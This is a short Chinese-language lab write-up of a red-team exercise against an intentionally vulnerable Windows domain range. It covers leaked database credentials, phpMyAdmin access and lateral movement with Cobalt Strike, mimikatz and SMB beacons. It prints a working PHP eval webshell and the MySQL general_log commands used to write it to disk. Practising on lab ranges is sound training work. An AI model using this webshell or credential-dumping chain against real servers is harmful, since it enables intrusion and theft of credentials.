ATT&CK 实战系列 - 红队评估(一)靶场笔记#
概况:
虚拟机密码
hongrisec@2019 登陆后需重设
win7
192.168.0.1/24 桥接
192.168.52.0/24 内网
win2003
192.168.52.0/24 内网
win2008
192.168.52.0/24 内网
靶机部署
先启动 win2008 DC 主机
再启动 win2003
最后启动 win7
win7 主机 C 盘下启动 phpstudy(软件损坏无法启动,自行另外安装并且迁移 WWW 内除 phpmyadmin 外文件)
正文#
先对外网服务器扫描,查看 80 端口。
扫描爆破下目录,发现可以列目录。(可能是新装 phpstudy 导致的)发现存在敏感文件 beifen.rar 和 phpmyadmin 登录。
下载敏感文件解压,发现是源码。按照源码文件夹拼接 url,发现一个存在一个残缺的 cms,仔细查看没什么用。
再看源码,从源码中找到数据库密码
拿到数据库 root 账户密码,正好可以登 phpmyadmin
先写一个一句话,路径可以从探针里获得
select "<?php @eval($_POST[a]);?>" into outfile (“C:/WWW/11.php”);
失败了,有限制
改用日志试试
set global general_log='on'; #开启日志功能
set global general_log_file=’D:/WWW/xxx.php’; #设置日志保存地址
最后再查询一下,让查询内容写进去
select ‘<?php @eval($_POST[a]);?>’;
然后用菜刀连接(最开始用了蚁剑,但是连不上,原因未知。)
用菜刀再写个冰蝎以备后患,冰蝎查下权限
用冰蝎弹 msf shell
msf 无法切入 shell,总是异常中断,猜测是杀软或者防火墙的原因
换老方法,用 webshell 传个马过去,虚拟终端主动与运行静等 cs 上线
上手先给自己再委派几个分身,防止掉会话
往下就没啥可说了,本来想着这套靶机可以玩花样,但拿到机器就是管理员权限,剩下两台主机服务崩的崩掉的掉,也没怎么搞。还是用老路子,先 mimikatz 读内存里的密码。
按网络拓扑图的思路,应该先拿下 win2003,再利用域拿下 win2008。这里票据传输进 2003,再读密码,获得域管账户,再传输进 2008。面对不出网机器需要走 SMB beacon。攻击会话注意网段。